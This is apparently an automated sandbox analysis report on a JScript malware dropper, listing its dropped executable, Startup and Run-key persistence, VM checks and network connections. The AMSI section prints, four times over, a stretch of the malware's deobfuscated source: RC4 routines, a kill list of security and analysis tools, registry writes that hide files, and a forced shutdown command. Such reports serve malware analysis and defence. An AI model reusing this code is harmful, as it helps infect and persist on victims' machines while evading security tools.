Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl
Source: unknown	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl
Source: unknown	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Source: unknown	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Source: unknown	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\AppData\Local\nsoerwoel\pfuryr.js'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source:	Binary string: scrrun.pdb source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdbGCTL source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source:	Binary string: wshom.pdbUGP source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source:	Binary string: wscript.pdb source: wscript.exe, 00000002.00000003.193074239.000002156F2CE000.00000004.00000001.sdmp, ibfmvoj.exe, 00000007.00000000.194981933.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 00000008.00000000.195930312.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000A.00000000.218346698.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000B.00000000.235028464.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe, 0000000E.00000002.263613446.00007FF7C0BA5000.00000002.00020000.sdmp, ibfmvoj.exe.2.dr
Source:	Binary string: wshom.pdb source: wscript.exe, 00000002.00000002.457281390.000002156F240000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.453416950.000001F7A38D0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.457114333.000001D32E7C0000.00000002.00000001.sdmp
Source:	Binary string: scrrun.pdbUGP source: wscript.exe, 00000002.00000002.453794143.000002156D440000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452744081.000001F7A2110000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.456195117.000001D32E5B0000.00000002.00000001.sdmp

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 \| 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: C:\Windows\System32\wscript.exe	Anti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 \| 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Anti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 \| 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Anti Malware Scan Interface: wscript.shell"),b = new ActiveXObject("scripting.filesystemobject"),h = function() {return ((1 + Math.random()) * 65536 \| 0).toString(16).substring(1)},d = a.environment("process"),f = d("username"),g = d("computername"),ru = new ActiveXObject("shell.application"),lo = [],fup = [],dod = "",dot = 0,hf = function(e) {try {var t = b.getFolder(e);t.attributes = 2} catch (n) {}},sc = function(e) {e += "";var t = 0;for (var n = 0; n < e.length; n++) t = (t << 5) - t + e.charCodeAt(n), t &= t;return Math.abs(t)},ha = function(e) {var t = "",n = sc(e);for (var r = 0; r < sc(e) % 5 + 5; r++) n = sc(t + n), t += String.fromCharCode(n % 25 + 97);return t};var zzo = function() {var ttw = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];for (var i = 0, h, wep; i < ttw.length; i++) {try {var h = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");h.open("GET", ttw[i]);h.setRequestHeader("User-Agent", _.u);h.setRequestHeader("Cache-Control", "no-cache");h.setRequestHeader("Pragma", "no-cache");h.setRequestHeader("Connection", "close");h.send("");wep = new Date(h.getAllResponseHeaders().split("Date: ").pop().split("\n").shift()).getTime() / 1000;if (1388534400 < wep) {return wep}} catch (e) {}}return false;};var hr = function(e) {if (e) var t = 1,n = 1;else var t = 2,n = 0;try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", t, "REG_DWORD")} catch (r) {}try {a.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", n, "REG_DWORD")} catch (r) {}};var rc = function(key, str) {var s = [],j = 0,x, res = "";for (var i = 0; i < 256; i++) {s[i] = i;}for (i = 0; i < 256; i++) {j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;x = s[i];s[i] = s[j];s[j] = x;}i = 0;j = 0;for (var y = 0; y < str.length; y++) {i = (i + 1) % 256;j = (j + s[i]) % 256;x = s[i];s[i] = s[j];s[j] = x;res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);}return res;};var cob = function() {return Math.floor((1 + Math.random()) * 0x10000).toString(16).substring(1)};var zbo = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];var shh = function(o) {for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);return o;};var kp = function() {if (b.fileExists(bfo + ha(g + "a09"))) WScript.quit()};var zt = function() {try {var t = b.openTextFile(bfo + ha(g + "a00"), 8, !0);t.close();if (b.fileExists(bfo + ha(g + "a14")) == false) a.run("%comspec% /c shutdown /p /f", 0);} catch (e) {}};var fuu = function() {v

Source: xPUqa4qbDL

String : entropy: 5.81, length: 14783, content: ",{y$g*m%r=-5 ,e($t$R$1zO$7:G670v>5&70*>5&E&AyO$7Q%~~p\"eD9C45,lm$h%{)$cX55E2E?5[~rK8P$.:I-5E&t\"ili

Go to definition

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ttdwagotd.lnk

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run uobmovqn			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run uobmovqn			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Renames wscript.exe to bypass HIPS

Show sources

Source: C:\Windows\System32\wscript.exe

File opened: C:\Windows\system32\wscript.exe

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6516

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0B9D4A0 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,

7_2_00007FF7C0B9D4A0

Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWonnection-WFP Native MAC Layer LightWeight Filter-0000
Source: wscript.exe, 00000002.00000002.459547225.000002156F812000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000002.00000002.458993703.000002156F540000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0BA0CC4 GetProcessHeap,RtlReAllocateHeap,memcpy,

7_2_00007FF7C0BA0CC4

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe

Code function: 7_2_00007FF7C0BA3CC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

7_2_00007FF7C0BA3CC8

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: ibfmvoj.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\wscript.exe	Network Connect: 204.11.56.48 80	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 72.52.178.23 80	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 199.59.242.153 80	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' xesyl	Jump to behavior

Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: wscript.exe, 00000002.00000002.453965478.000002156D7F0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000007.00000002.452905926.000001F7A24C0000.00000002.00000001.sdmp, ibfmvoj.exe, 00000008.00000002.453278666.000001D32CC60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: GetUserDefaultLangID,GetLocaleInfoW,GetModuleFileNameW,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,		7_2_00007FF7C0BA0EC4
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,_wcsncoll,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,		7_2_00007FF7C0BA340C

Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID	Jump to behavior
